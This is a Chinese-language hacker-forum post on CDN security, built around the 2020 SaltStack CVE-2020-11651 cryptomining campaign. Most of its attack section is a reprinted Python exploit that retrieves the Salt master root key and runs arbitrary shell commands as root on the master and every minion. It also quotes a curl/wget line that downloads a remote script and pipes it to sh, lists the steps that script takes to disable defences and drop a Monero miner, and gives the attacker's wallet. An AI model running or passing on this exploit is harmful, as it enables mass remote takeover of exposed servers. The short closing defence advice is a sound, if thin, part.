• Welcome to the world's largest Chinese hacker forum

    Welcome to the world's largest Chinese hacker forum, our forum registration is open! You can now register for technical communication with us, this is a free and open to the world of the BBS, we founded the purpose for the study of network security, please don't release business of black/grey, or on the BBS posts, to seek help hacker if violations, we will permanently frozen your IP and account, thank you for your cooperation. Hacker attack and defense cracking or network Security

    business please click here: Creation Security  From CNHACKTEAM

CDN防御方案


This Wind

Recommended Posts

0x00、前言

今天通过SaltStack漏洞这个药引子,聊聊CDN网络安全防护这个话题。先聊聊,CDN定义:Content Delivery Network,内容分发网络,给用户带来的价值,加速获得其静态或者动态内容,典型的应用场景,360安全卫士中的软件安装,后台使用的就CDN网络。在比如目前比较火的抖音短视频,用户在某个地方上传视频后,几亿的用户都可以快速看到,很难想象,如果这个短视频在一台服务器上,几千万人同时去下载,网络堵塞延迟会多大?

再聊聊SaltStack,是一个服务器基础架构集中化管理平台,几分钟之内就可以运行起来,速度特别快,服务器之间秒级通讯,扩展性好,很容易批量管理上万台服务器,显著的降低人力与运维成本。它是简化版的puppet,saltstack基于Python语言实现,结合轻量级消息队列(ZeroMQ),Python第三方模块(Pyzmq、PyCrypto、Pyjinjia2、python-msgpack和PyYAML等)构建,SaltStack是一套C/S架构的运维工具,服务端口默认为4505/4506,两个端口如果对外网开放危害非常大。

目前商业化的CDN绝大部分都在使用SaltStack做软件分发系统。黑客利用SaltStack的远程命令执行漏洞CVE-2020-11651可以直接绕过Salt-Master的认证机制,调用相关函数向Salt-Minion下发指令执行系统命令,最终导致挖矿。

0x01、攻击详情

浅谈CDN网络安全防护方案

浅谈CDN网络安全防护方案1、通过网络空间搜索引擎https://www.shodan.io/等获取 外网开发SaltStack master的主机列表。

2、通过cve-2020-11651.py批量执行,下载sa.sh脚本。获取到master key,在几分钟内就会吧命令传递到cdn服务器连接的client,*山云大约有几千台机器就是这么感染的。(curl -s x.x.x.x/sa.sh||wget -q -O- x.x.x.x/sa.sh)|sh

def ping_master():
    print("Attempting to ping master at "+master_ip)
    try:
        msg = {"cmd":"ping"}
        response = clear_channel.send(msg, timeout=3)
        if response:
            return True
    except salt.exceptions.SaltReqTimeoutError:
        return False

    return False


def get_rootkey():
    try:
        response = clear_channel.send({'cmd':'_prep_auth_info'}, timeout=2)
        for i in response:
            if isinstance(i,dict) and len(i) == 1:
                rootkey = list(i.values())[0]
                print("Retrieved root key: " + rootkey)
                return rootkey

        return False
        
    except:
        return False


def send_command_to_minions(command):
    print("Sending command to all minions on master")
    jid = "{0:%Y%m%d%H%M%S%f}".format(datetime.datetime.utcnow())
    cmd = "/bin/sh -c '{0}'".format(command)

    msg = {'cmd':"_send_pub","fun":"cmd.run","arg":[cmd],"tgt":"*","ret":"","tgt_type":"glob","user":"root","jid":jid}

    try:
        response = clear_channel.send(msg,timeout=3)
        if response == None:
            return True
        else:
            return False
    except:
        return False



def master_shell(root_key,command):

    msg = {"key":root_key,
            "cmd":"runner",
            'fun': 'salt.cmd',
            "kwarg":{
                "fun":"cmd.exec_code",
                "lang":"python3",
                "code":"import subprocess;subprocess.call('{}',shell=True)".format(command)
                },
            'jid': '20200504042611133934',
            'user': 'sudo_user',
            '_stamp': '2020-05-04T04:26:13.609688'}

    try:
        response = clear_channel.send(msg,timeout=3)
        print("Got response for attempting master shell: "+str(response)+ ". Looks promising!")
        return True
    except:
        print("something failed")
        return False



if __name__=="__main__":
    if len(sys.argv) <= 2:
        print("Not enough args")
        print("Use like python3 cve-2020-11651.py)
        sys.exit(1)
    
    
    target = sys.argv[1]
    master_minion_root = sys.argv[2]


    master_ip = target
    master_port = '4506'

    minion_config = {

    'transport': 'zeromq',
    'pki_dir': '/tmp',
    'id': 'root',
    'log_level': 'debug',
    'master_ip': master_ip,
    'master_port': master_port,
    'auth_timeout': 5,
    'auth_tries': 1,
    'master_uri': 'tcp://{0}:{1}'.format(master_ip, master_port)
    }

    clear_channel = salt.transport.client.ReqChannel.factory(minion_config, crypt='clear')

    if not ping_master():
        print("Failed to ping the specified master server, exiting")
        sys.exit(1)


    if master_minion_root == "master" or master_minion_root == "minions":
        command = sys.argv[3]
        rootkey = get_rootkey()
        if not rootkey:
            print("Failed to fetch the root key from the instance. This MAY indicate that it is patched")
            sys.exit(1)
        else:
            if master_minion_root == "master":
                master_shell(rootkey,command)
            else:
                send_command_to_minions(command)

    elif master_minion_root == "fetchkeyonly":
        get_rootkey()

    else:
        print("Invalid usage")

3、执行sa.sh做以下操作:

@1、关闭防火墙、设置ulimit、系统syslog日志删除、设置tmp目录权限关闭watchdog,设置ssh共哟啊文件权限,清理tmp目录等。

@2、干掉安骑士,云镜(用齐自身卸载脚本操作),看来阿里云和腾讯云的CDN网络受到严重的摧残,也说明黑客分子在不断的进化当中,因为很多时候,这种下载脚本在本机上有主机安全软件的情况下,都是无效的。

@3、清理cpu资源占用超过10%的进程,保证有更多的硬件资源可以挖矿。也间接终止其他挖矿进程。同时清理docker形式运行的挖矿进程。

@4、然后下载salt-store,释放出罗门币挖矿进程。

4、salt-store执行以下操作

@1、使用masscan扫描redis服务器,二进制分析

@2、样本传到virustotal上发现连接的连接C2地址(IP地址)。

由于3、4网上有很多分析,我就不在赘述,不过从整个入侵过程来看,黑客搞的这个脚本目的是短平快,C2更新使用的IP而非域名,这个有点low,但是他把挖矿程序开足马力,能挖多久就挖多久,门罗币钱包为:

46V5WXwS3gXfsgR7fgXeGP4KAXtQTXJfkicBoRSHXwGbhVzj1JXZRJRhbMrvhxvXvgbJuyV3GGWzD6JvVMuQwAXxLZmTWkb

这个罗门币里面大约获利400万左右。正好赶上五一期间,但是黑客显然没有运维经验,CPU搞那么高,监控肯定能发现,大规模服务器出现CPU过高情况,肯定会有安全分析人员登录服务器检查。还有CDN会托管图片等静态资源,突然之间有超时的情况,也会引起重视的。估计4月30号开扫描,挖到5月3号。还有估计也没想到会有那么多CDN服务提供商中招。

0x02、CDN安全防护方案

针对CDN这种边缘服务,其实很难设计安全防护方案,因为,CDN厂商为了节省资源,二级节点一般部署10台二手服务器,处理带宽40~80G。一级节点也就20台服务器,做cache用。公有云CDN业务本身就是赔钱的买卖。你说上一套具备纵深防护体系的安全解决方案是不现实的。个人觉得只要在物理服务器上安装主机安全Agent就满足需求了。有的CDN厂商还在CDN机房扩建高防机房,复用带宽,这种情况下,针对主机层面的网络通讯流量,处理尤为重要。所以,主机安全Agent对网络流量的监控建议disable掉。主要能抓到挖矿进程就好。

 

Link to comment
Share on other sites

Create an account or sign in to comment

You need to be a member in order to leave a comment

Create an account

Sign up for a new account in our community. It's easy!

Register a new account

Sign in

Already have an account? Sign in here.

Sign In Now